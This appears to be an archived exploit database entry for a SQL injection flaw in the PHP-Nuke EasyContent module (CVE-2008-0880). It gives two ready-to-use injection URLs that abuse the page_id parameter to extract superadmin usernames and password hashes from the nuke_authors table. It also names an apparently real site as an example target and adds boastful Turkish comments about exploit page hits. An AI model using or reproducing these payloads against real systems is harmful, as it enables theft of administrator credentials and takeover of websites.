PHP-Nuke Module EasyContent - 'page_id' SQL Injection

Author: Mehmet Ince
type: webapps
platform: php
port: nan
date_added: 2008-02-18 
date_updated: 2016-11-11 
verified: 1 
codes: OSVDB-42265;CVE-2008-0880 
tags: 
aliases:  
screenshot_url:  
application_url:

-------------------------------------------------------------------------------
php-nuke modules EasyContent remote sql inj
-------------------------------------------------------------------------------
found =xoron
-------------------------------------------------------------------------------
modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
-------------------------------------------------------------------------------
Example: http://eurowards.org/content/

not: password and username in title! colomb number 1

not2: Adam gibi bug bulunda dolanÄ±n ortalarda, istenilince ne kadar boÅŸ bug varsa bÃ¶le post edilir milw0rma.
iÅŸe yarar bug nasÄ±l hit yapÄ±yor gÃ¶rmek istiyorsanÄ±z

http://www.milw0rm.com/author/721

sadece bi bug 16000+  hit sadece milw0rm;)

Herzmn kral benimdir!
-------------------------------------------------------------------------------

# milw0rm.com [2008-02-19]